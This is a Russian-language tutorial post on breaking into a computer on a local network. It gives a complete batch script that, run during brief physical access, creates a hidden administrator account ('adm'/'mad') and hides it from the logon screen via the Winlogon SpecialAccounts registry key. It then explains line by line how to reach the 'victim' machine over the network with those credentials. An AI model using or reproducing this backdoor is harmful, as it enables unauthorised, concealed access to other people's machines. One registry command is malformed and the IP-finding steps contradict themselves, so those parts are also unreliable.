Взлом локалки методом невидимой учетки с правами администратора.

Понадобилось получить достут к одному компу в локальной сети. Из сети к нему не подобраться, но иногда, ненадолго, есть физический доступ к машине.

Способ сработает в том случае, если комп не запаролен или оставлен без присмотра включенным.

Сначала пишется батник, который нужно установить и запустить на целевой машине. Он создаст скрытую учетную запись администратора.

@echo off  

net user adm mad /add   

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%   

net localgroup %AdmGroup% /add adm   

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v/t adm REG_DWORD /d 0 /f

Скрипт создаст скрытого администратора с именем adm и паролем mad. (Можно поменять их в коде на свои).

Разберем код:

1) 

@echo off  

Заставит работать скрипт в невидимом режиме.

2)

net user adm mad /add 

Создает пользователя, совсем еще обычного, не администратора.

3)

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%

Теперь нам нужно узнать имя локальной группы администраторов и записать ее в переменную, чтобы позже добавить туда нашего новоиспеченного юзера.

4)

net localgroup %AdmGroup% /add adm

Эта строчка, делает юзера полноценным админом системы.

5)

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v/t adm REG_DWORD /d 0 /f

А эти, создают невидимого администратора на целевом компе.

Достум получаем по локальной сети.

Для этого, надо знать айпи-адрес компьютера жертвы, на котором создана учетка админа.

Для того чтобы узнать адрес машины с установленным батником, нужно зайти в Пуск -> Выполнить и ввести там cmd. Теперь откроется черное окошко, в котором нужно ввести ipconfig и выдадутся подключения по сети, а теперь не перепутайте "Подключение по локальной сети" и подключение к Интернету. Айпи адрес в сети у машины - жертвы, тот который написан напротив "IP-адрес" в подключении к интернету.


Окно с айпи адресом

Далее, уже на любом подключенном к этой локальной сети компьютере нажмите "Win+R", надо запустить "Выполнить".

Потом пишите \\ip адрес компьютера, к примеру \\95.ХХХ.60.ХХ и жмете Enter. Вас попросит ввести логин и пароль, тут надо ввести логин и пароль, которые был указан при создании пользователя, в батнике. Все, теперь есть доступ к этому компьютеру.

Скрипт найтен в тырнэте. Его автор - Сулико Асабашвили.